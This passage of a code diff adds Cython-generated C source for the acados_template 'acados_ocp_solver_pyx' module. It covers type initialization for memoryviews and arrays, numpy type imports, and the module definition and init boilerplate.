&& __pyx_array_type->tp_base->tp_as_buffer->bf_releasebuffer) { + __pyx_array_type->tp_as_buffer->bf_releasebuffer = __pyx_array_type->tp_base->tp_as_buffer->bf_releasebuffer; + } + #elif defined(Py_bf_getbuffer) && defined(Py_bf_releasebuffer) + /* PY_VERSION_HEX >= 0x03090000 || Py_LIMITED_API >= 0x030B0000 */ + #elif defined(_MSC_VER) + #pragma message ("The buffer protocol is not supported in the Limited C-API < 3.11.") + #else + #warning "The buffer protocol is not supported in the Limited C-API < 3.11." + #endif + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type___pyx_array_spec, __pyx_array_type) < 0) __PYX_ERR(1, 114, __pyx_L1_error) + #else + __pyx_array_type = &__pyx_type___pyx_array; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_array_type) < 0) __PYX_ERR(1, 114, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_array_type->tp_print = 0; + #endif + if (__Pyx_SetVtable(__pyx_array_type, __pyx_vtabptr_array) < 0) __PYX_ERR(1, 114, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_MergeVtables(__pyx_array_type) < 0) __PYX_ERR(1, 114, __pyx_L1_error) + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_array_type) < 0) __PYX_ERR(1, 114, __pyx_L1_error) + #endif + #if CYTHON_USE_TYPE_SPECS + __pyx_MemviewEnum_type = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type___pyx_MemviewEnum_spec, NULL); if (unlikely(!__pyx_MemviewEnum_type)) __PYX_ERR(1, 302, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type___pyx_MemviewEnum_spec, __pyx_MemviewEnum_type) < 0) __PYX_ERR(1, 302, __pyx_L1_error) + #else + __pyx_MemviewEnum_type = &__pyx_type___pyx_MemviewEnum; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_MemviewEnum_type) < 0) __PYX_ERR(1, 302, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_MemviewEnum_type->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_MemviewEnum_type->tp_dictoffset && __pyx_MemviewEnum_type->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_MemviewEnum_type->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_MemviewEnum_type) < 0) __PYX_ERR(1, 302, __pyx_L1_error) + #endif + __pyx_vtabptr_memoryview = &__pyx_vtable_memoryview; + __pyx_vtable_memoryview.get_item_pointer = (char *(*)(struct __pyx_memoryview_obj *, PyObject *))__pyx_memoryview_get_item_pointer; + __pyx_vtable_memoryview.is_slice = (PyObject *(*)(struct __pyx_memoryview_obj *, PyObject *))__pyx_memoryview_is_slice; + __pyx_vtable_memoryview.setitem_slice_assignment = (PyObject *(*)(struct __pyx_memoryview_obj *, PyObject *, PyObject *))__pyx_memoryview_setitem_slice_assignment; + __pyx_vtable_memoryview.setitem_slice_assign_scalar = (PyObject *(*)(struct __pyx_memoryview_obj *, struct __pyx_memoryview_obj *, PyObject *))__pyx_memoryview_setitem_slice_assign_scalar; + __pyx_vtable_memoryview.setitem_indexed = (PyObject *(*)(struct __pyx_memoryview_obj *, PyObject *, PyObject *))__pyx_memoryview_setitem_indexed; + __pyx_vtable_memoryview.convert_item_to_object = (PyObject *(*)(struct __pyx_memoryview_obj *, char *))__pyx_memoryview_convert_item_to_object; + __pyx_vtable_memoryview.assign_item_from_object = (PyObject *(*)(struct __pyx_memoryview_obj *, char *, PyObject *))__pyx_memoryview_assign_item_from_object; + __pyx_vtable_memoryview._get_base = (PyObject *(*)(struct __pyx_memoryview_obj *))__pyx_memoryview__get_base; + #if CYTHON_USE_TYPE_SPECS + __pyx_memoryview_type = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type___pyx_memoryview_spec, NULL); if (unlikely(!__pyx_memoryview_type)) __PYX_ERR(1, 337, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + __pyx_memoryview_type->tp_as_buffer = &__pyx_tp_as_buffer_memoryview; + if (!__pyx_memoryview_type->tp_as_buffer->bf_releasebuffer && __pyx_memoryview_type->tp_base->tp_as_buffer && __pyx_memoryview_type->tp_base->tp_as_buffer->bf_releasebuffer) { + __pyx_memoryview_type->tp_as_buffer->bf_releasebuffer = __pyx_memoryview_type->tp_base->tp_as_buffer->bf_releasebuffer; + } + #elif defined(Py_bf_getbuffer) && defined(Py_bf_releasebuffer) + /* PY_VERSION_HEX >= 0x03090000 || Py_LIMITED_API >= 0x030B0000 */ + #elif defined(_MSC_VER) + #pragma message ("The buffer protocol is not supported in the Limited C-API < 3.11.") + #else + #warning "The buffer protocol is not supported in the Limited C-API < 3.11." + #endif + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type___pyx_memoryview_spec, __pyx_memoryview_type) < 0) __PYX_ERR(1, 337, __pyx_L1_error) + #else + __pyx_memoryview_type = &__pyx_type___pyx_memoryview; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_memoryview_type) < 0) __PYX_ERR(1, 337, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_memoryview_type->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_memoryview_type->tp_dictoffset && __pyx_memoryview_type->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_memoryview_type->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + if (__Pyx_SetVtable(__pyx_memoryview_type, __pyx_vtabptr_memoryview) < 0) __PYX_ERR(1, 337, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_MergeVtables(__pyx_memoryview_type) < 0) __PYX_ERR(1, 337, __pyx_L1_error) + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_memoryview_type) < 0) __PYX_ERR(1, 337, __pyx_L1_error) + #endif + __pyx_vtabptr__memoryviewslice = &__pyx_vtable__memoryviewslice; + __pyx_vtable__memoryviewslice.__pyx_base = *__pyx_vtabptr_memoryview; + __pyx_vtable__memoryviewslice.__pyx_base.convert_item_to_object = (PyObject *(*)(struct __pyx_memoryview_obj *, char *))__pyx_memoryviewslice_convert_item_to_object; + __pyx_vtable__memoryviewslice.__pyx_base.assign_item_from_object = (PyObject *(*)(struct __pyx_memoryview_obj *, char *, PyObject *))__pyx_memoryviewslice_assign_item_from_object; + __pyx_vtable__memoryviewslice.__pyx_base._get_base = (PyObject *(*)(struct __pyx_memoryview_obj *))__pyx_memoryviewslice__get_base; + #if CYTHON_USE_TYPE_SPECS + __pyx_t_1 = PyTuple_Pack(1, (PyObject *)__pyx_memoryview_type); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 952, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_memoryviewslice_type = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type___pyx_memoryviewslice_spec, __pyx_t_1); + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_memoryviewslice_type)) __PYX_ERR(1, 952, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type___pyx_memoryviewslice_spec, __pyx_memoryviewslice_type) < 0) __PYX_ERR(1, 952, __pyx_L1_error) + #else + __pyx_memoryviewslice_type = &__pyx_type___pyx_memoryviewslice; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + __pyx_memoryviewslice_type->tp_base = __pyx_memoryview_type; + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_memoryviewslice_type) < 0) __PYX_ERR(1, 952, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_memoryviewslice_type->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_memoryviewslice_type->tp_dictoffset && __pyx_memoryviewslice_type->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_memoryviewslice_type->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + if (__Pyx_SetVtable(__pyx_memoryviewslice_type, __pyx_vtabptr__memoryviewslice) < 0) __PYX_ERR(1, 952, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_MergeVtables(__pyx_memoryviewslice_type) < 0) __PYX_ERR(1, 952, __pyx_L1_error) + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_memoryviewslice_type) < 0) __PYX_ERR(1, 952, __pyx_L1_error) + #endif + __Pyx_RefNannyFinishContext(); + return 0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_RefNannyFinishContext(); + return -1; +} + +static int __Pyx_modinit_type_import_code(void) { + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__Pyx_modinit_type_import_code", 0); + /*--- Type import code ---*/ + __pyx_t_1 = PyImport_ImportModule(__Pyx_BUILTIN_MODULE_NAME); if (unlikely(!__pyx_t_1)) __PYX_ERR(3, 9, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_ptype_7cpython_4type_type = __Pyx_ImportType_3_0_0(__pyx_t_1, __Pyx_BUILTIN_MODULE_NAME, "type", + #if defined(PYPY_VERSION_NUM) && PYPY_VERSION_NUM < 0x050B0000 + sizeof(PyTypeObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyTypeObject), + #elif CYTHON_COMPILING_IN_LIMITED_API + sizeof(PyTypeObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyTypeObject), + #else + sizeof(PyHeapTypeObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyHeapTypeObject), + #endif + __Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_7cpython_4type_type) __PYX_ERR(3, 9, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = PyImport_ImportModule("numpy"); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 202, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_ptype_5numpy_dtype = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "dtype", sizeof(PyArray_Descr), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyArray_Descr),__Pyx_ImportType_CheckSize_Ignore_3_0_0); if (!__pyx_ptype_5numpy_dtype) __PYX_ERR(2, 202, __pyx_L1_error) + __pyx_ptype_5numpy_flatiter = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "flatiter", sizeof(PyArrayIterObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyArrayIterObject),__Pyx_ImportType_CheckSize_Ignore_3_0_0); if (!__pyx_ptype_5numpy_flatiter) __PYX_ERR(2, 225, __pyx_L1_error) + __pyx_ptype_5numpy_broadcast = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "broadcast", sizeof(PyArrayMultiIterObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyArrayMultiIterObject),__Pyx_ImportType_CheckSize_Ignore_3_0_0); if (!__pyx_ptype_5numpy_broadcast) __PYX_ERR(2, 229, __pyx_L1_error) + __pyx_ptype_5numpy_ndarray = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "ndarray", sizeof(PyArrayObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyArrayObject),__Pyx_ImportType_CheckSize_Ignore_3_0_0); if (!__pyx_ptype_5numpy_ndarray) __PYX_ERR(2, 238, __pyx_L1_error) + __pyx_ptype_5numpy_generic = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "generic", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_generic) __PYX_ERR(2, 812, __pyx_L1_error) + __pyx_ptype_5numpy_number = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "number", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_number) __PYX_ERR(2, 814, __pyx_L1_error) + __pyx_ptype_5numpy_integer = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "integer", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_integer) __PYX_ERR(2, 816, __pyx_L1_error) + __pyx_ptype_5numpy_signedinteger = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "signedinteger", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_signedinteger) __PYX_ERR(2, 818, __pyx_L1_error) + __pyx_ptype_5numpy_unsignedinteger = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "unsignedinteger", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_unsignedinteger) __PYX_ERR(2, 820, __pyx_L1_error) + __pyx_ptype_5numpy_inexact = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "inexact", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_inexact) __PYX_ERR(2, 822, __pyx_L1_error) + __pyx_ptype_5numpy_floating = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "floating", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_floating) __PYX_ERR(2, 824, __pyx_L1_error) + __pyx_ptype_5numpy_complexfloating = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "complexfloating", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_complexfloating) __PYX_ERR(2, 826, __pyx_L1_error) + __pyx_ptype_5numpy_flexible = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "flexible", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_flexible) __PYX_ERR(2, 828, __pyx_L1_error) + __pyx_ptype_5numpy_character = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "character", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_character) __PYX_ERR(2, 830, __pyx_L1_error) + __pyx_ptype_5numpy_ufunc = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "ufunc", sizeof(PyUFuncObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyUFuncObject),__Pyx_ImportType_CheckSize_Ignore_3_0_0); if (!__pyx_ptype_5numpy_ufunc) __PYX_ERR(2, 868, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_RefNannyFinishContext(); + return 0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_RefNannyFinishContext(); + return -1; +} + +static int __Pyx_modinit_variable_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_variable_import_code", 0); + /*--- Variable import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_function_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_function_import_code", 0); + /*--- Function import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + + +#if PY_MAJOR_VERSION >= 3 +#if CYTHON_PEP489_MULTI_PHASE_INIT +static PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def); /*proto*/ +static int __pyx_pymod_exec_acados_ocp_solver_pyx(PyObject* module); /*proto*/ +static PyModuleDef_Slot __pyx_moduledef_slots[] = { + {Py_mod_create, (void*)__pyx_pymod_create}, + {Py_mod_exec, (void*)__pyx_pymod_exec_acados_ocp_solver_pyx}, + {0, NULL} +}; +#endif + +#ifdef __cplusplus +namespace { + struct PyModuleDef __pyx_moduledef = + #else + static struct PyModuleDef __pyx_moduledef = + #endif + { + PyModuleDef_HEAD_INIT, + "acados_ocp_solver_pyx", + 0, /* m_doc */ + #if CYTHON_PEP489_MULTI_PHASE_INIT + 0, /* m_size */ + #elif CYTHON_USE_MODULE_STATE + sizeof(__pyx_mstate), /* m_size */ + #else + -1, /* m_size */ + #endif + __pyx_methods /* m_methods */, + #if CYTHON_PEP489_MULTI_PHASE_INIT + __pyx_moduledef_slots, /* m_slots */ + #else + NULL, /* m_reload */ + #endif + #if CYTHON_USE_MODULE_STATE + __pyx_m_traverse, /* m_traverse */ + __pyx_m_clear, /* m_clear */ + NULL /* m_free */ + #else + NULL, /* m_traverse */ + NULL, /* m_clear */ + NULL /* m_free */ + #endif + }; + #ifdef __cplusplus +} /* anonymous namespace */ +#endif +#endif + +#ifndef CYTHON_NO_PYINIT_EXPORT +#define __Pyx_PyMODINIT_FUNC PyMODINIT_FUNC +#elif PY_MAJOR_VERSION < 3 +#ifdef __cplusplus +#define __Pyx_PyMODINIT_FUNC extern "C" void +#else +#define __Pyx_PyMODINIT_FUNC void +#endif +#else +#ifdef __cplusplus +#define __Pyx_PyMODINIT_FUNC extern "C" PyObject * +#else +#define __Pyx_PyMODINIT_FUNC PyObject * +#endif +#endif + + +#if PY_MAJOR_VERSION < 3 +__Pyx_PyMODINIT_FUNC initacados_ocp_solver_pyx(void) CYTHON_SMALL_CODE; /*proto*/ +__Pyx_PyMODINIT_FUNC initacados_ocp_solver_pyx(void) +#else +__Pyx_PyMODINIT_FUNC PyInit_acados_ocp_solver_pyx(void) CYTHON_SMALL_CODE; /*proto*/ +__Pyx_PyMODINIT_FUNC PyInit_acados_ocp_solver_pyx(void) +#if CYTHON_PEP489_MULTI_PHASE_INIT +{ + return PyModuleDef_Init(&__pyx_moduledef); +} +static CYTHON_SMALL_CODE int __Pyx_check_single_interpreter(void) { + #if PY_VERSION_HEX >= 0x030700A1 + static PY_INT64_T main_interpreter_id = -1; + PY_INT64_T current_id = PyInterpreterState_GetID(PyThreadState_Get()->interp); + if (main_interpreter_id == -1) { + main_interpreter_id = current_id; + return (unlikely(current_id == -1)) ? -1 : 0; + } else if (unlikely(main_interpreter_id != current_id)) + #else + static PyInterpreterState *main_interpreter = NULL; + PyInterpreterState *current_interpreter = PyThreadState_Get()->interp; + if (!main_interpreter) { + main_interpreter = current_interpreter; + } else if (unlikely(main_interpreter != current_interpreter)) + #endif + { + PyErr_SetString( + PyExc_ImportError, + "Interpreter change detected - this module can only be loaded into one interpreter per process."); + return -1; + } + return 0; +} +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *module, const char* from_name, const char* to_name, int allow_none) +#else +static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *moddict, const char* from_name, const char* to_name, int allow_none) +#endif +{ + PyObject *value = PyObject_GetAttrString(spec, from_name); + int result = 0; + if (likely(value)) { + if (allow_none || value != Py_None) { +#if CYTHON_COMPILING_IN_LIMITED_API + result = PyModule_AddObject(module, to_name, value); +#else + result = PyDict_SetItemString(moddict, to_name, value); +#endif + } + Py_DECREF(value); + } else if (PyErr_ExceptionMatches(PyExc_AttributeError)) { + PyErr_Clear(); + } else { + result = -1; + } + return result; +} +static CYTHON_SMALL_CODE PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def) { + PyObject *module = NULL, *moddict, *modname; + CYTHON_UNUSED_VAR(def); + if (__Pyx_check_single_interpreter()) + return NULL; + if (__pyx_m) + return __Pyx_NewRef(__pyx_m); + modname = PyObject_GetAttrString(spec, "name"); + if (unlikely(!modname)) goto bad; + module = PyModule_NewObject(modname); + Py_DECREF(modname); + if (unlikely(!module)) goto bad; +#if CYTHON_COMPILING_IN_LIMITED_API + moddict = module; +#else + moddict = PyModule_GetDict(module); + if (unlikely(!moddict)) goto bad; +#endif + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "loader", "__loader__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "origin", "__file__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "parent", "__package__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "submodule_search_locations", "__path__", 0) < 0)) goto bad; + return module; +bad: + Py_XDECREF(module); + return NULL; +} + + +static CYTHON_SMALL_CODE int __pyx_pymod_exec_acados_ocp_solver_pyx(PyObject *__pyx_pyinit_module) +#endif +#endif +{ + int stringtab_initialized = 0; + #if CYTHON_USE_MODULE_STATE + int pystate_addmodule_run = 0; + #endif + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + int __pyx_t_6; + PyObject *__pyx_t_7 = NULL; + static PyThread_type_lock __pyx_t_8[8]; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannyDeclarations + #if CYTHON_PEP489_MULTI_PHASE_INIT + if (__pyx_m) { + if (__pyx_m == __pyx_pyinit_module) return 0; + PyErr_SetString(PyExc_RuntimeError, "Module 'acados_ocp_solver_pyx' has already been imported. Re-initialisation is not supported."); + return -1; + } + #elif PY_MAJOR_VERSION >= 3 + if (__pyx_m) return __Pyx_NewRef(__pyx_m); + #endif + /*--- Module creation code ---*/ + #if CYTHON_PEP489_MULTI_PHASE_INIT + __pyx_m = __pyx_pyinit_module; + Py_INCREF(__pyx_m); + #else + #if PY_MAJOR_VERSION < 3 + __pyx_m = Py_InitModule4("acados_ocp_solver_pyx", __pyx_methods, 0, 0, PYTHON_API_VERSION); Py_XINCREF(__pyx_m); + if (unlikely(!__pyx_m)) __PYX_ERR(0, 1, __pyx_L1_error) + #elif CYTHON_USE_MODULE_STATE + __pyx_t_1 = PyModule_Create(&__pyx_moduledef); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1, __pyx_L1_error) + { + int add_module_result = PyState_AddModule(__pyx_t_1, &__pyx_moduledef); + __pyx_t_1 = 0; /* transfer ownership from __pyx_t_1 to acados_ocp_solver_pyx pseudovariable */ + if (unlikely((add_module_result < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + pystate_addmodule_run = 1; + } + #else + __pyx_m = PyModule_Create(&__pyx_moduledef); + if (unlikely(!__pyx_m)) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #endif + CYTHON_UNUSED_VAR(__pyx_t_1); + __pyx_d = PyModule_GetDict(__pyx_m); if (unlikely(!__pyx_d)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_d); + __pyx_b = PyImport_AddModule(__Pyx_BUILTIN_MODULE_NAME); if (unlikely(!__pyx_b)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_b); + __pyx_cython_runtime = PyImport_AddModule((char *) "cython_runtime"); if (unlikely(!__pyx_cython_runtime)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_cython_runtime); + if (PyObject_SetAttrString(__pyx_m, "__builtins__", __pyx_b) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #if CYTHON_REFNANNY +__Pyx_RefNanny = __Pyx_RefNannyImportAPI("refnanny"); +if (!__Pyx_RefNanny) { + PyErr_Clear(); + __Pyx_RefNanny = __Pyx_RefNannyImportAPI("Cython.Runtime.refnanny"); + if (!__Pyx_RefNanny) + Py_FatalError("failed to import 'refnanny' module"); +} +#endif + __Pyx_RefNannySetupContext("__Pyx_PyMODINIT_FUNC PyInit_acados_ocp_solver_pyx(void)", 0); + if (__Pyx_check_binary_version() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #ifdef __Pxy_PyFrame_Initialize_Offsets + __Pxy_PyFrame_Initialize_Offsets(); + #endif + __pyx_empty_tuple = PyTuple_New(0); if (unlikely(!__pyx_empty_tuple)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_empty_bytes = PyBytes_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_bytes)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_empty_unicode = PyUnicode_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_unicode)) __PYX_ERR(0, 1, __pyx_L1_error) + #ifdef __Pyx_CyFunction_USED + if (__pyx_CyFunction_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_FusedFunction_USED + if (__pyx_FusedFunction_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_Coroutine_USED + if (__pyx_Coroutine_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_Generator_USED + if (__pyx_Generator_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_AsyncGen_USED + if (__pyx_AsyncGen_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_StopAsyncIteration_USED + if (__pyx_StopAsyncIteration_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + /*--- Library function declarations ---*/ + /*--- Threads initialization code ---*/ + #if defined(WITH_THREAD) && PY_VERSION_HEX < 0x030700F0 && defined(__PYX_FORCE_INIT_THREADS) && __PYX_FORCE_INIT_THREADS + PyEval_InitThreads(); + #endif + /*--- Initialize various global constants etc. ---*/ + if (__Pyx_InitConstants() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + stringtab_initialized = 1; + if (__Pyx_InitGlobals() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #if PY_MAJOR_VERSION < 3 && (__PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT) + if (__Pyx_init_sys_getdefaultencoding_params() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + if (__pyx_module_is_main_acados_template__acados_ocp_solver_pyx) { + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_name_2, __pyx_n_s_main) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + } + #if PY_MAJOR_VERSION >= 3 + { + PyObject *modules = PyImport_GetModuleDict(); if (unlikely(!modules)) __PYX_ERR(0, 1, __pyx_L1_error) + if (!PyDict_GetItemString(modules, "acados_template.acados_ocp_solver_pyx")) { + if (unlikely((PyDict_SetItemString(modules, "acados_template.acados_ocp_solver_pyx", __pyx_m) < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + } + } + #endif + /*--- Builtin init code ---*/ + if (__Pyx_InitCachedBuiltins() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + /*--- Constants init code ---*/ + if (__Pyx_InitCachedConstants() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + /*--- Global type/function init code ---*/ + (void)__Pyx_modinit_global_init_code(); + (void)__Pyx_modinit_variable_export_code(); + (void)__Pyx_modinit_function_export_code(); + if (unlikely((__Pyx_modinit_type_init_code() < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + if (unlikely((__Pyx_modinit_type_import_code() < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + (void)__Pyx_modinit_variable_import_code(); + (void)__Pyx_modinit_function_import_code(); + /*--- Execution code ---*/ + #if defined(__Pyx_Generator_USED) || defined(__Pyx_Coroutine_USED) + if (__Pyx_patch_abc() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + + /* "View.MemoryView":99 + * + * cdef object __pyx_collections_abc_Sequence "__pyx_collections_abc_Sequence" + * try: # <<<<<<<<<<<<<< + * if __import__("sys").version_info >= (3, 3): + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_1, &__pyx_t_2, &__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_1); 